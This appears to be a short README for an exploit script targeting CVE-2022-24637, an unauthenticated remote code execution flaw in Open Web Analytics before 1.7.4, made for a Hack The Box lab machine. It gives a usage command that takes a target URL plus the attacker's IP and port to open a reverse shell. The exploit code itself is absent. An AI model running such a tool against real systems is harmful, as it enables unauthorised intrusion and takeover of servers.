Unauthenticated RCE in Open Web Analytics version <1.7.4
This script is made to automate the CVE-2022-24637 vulnerability. I created this exploit for my Hackthebox machine vessel. https://app.hackthebox.com/machines/Vessel
The exploit and idea is based on https://devel0pment.de/?p=2494
Run the script with the following parameters:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
It might be possible that you need to run it a few times to get a shell.
The script can be improved.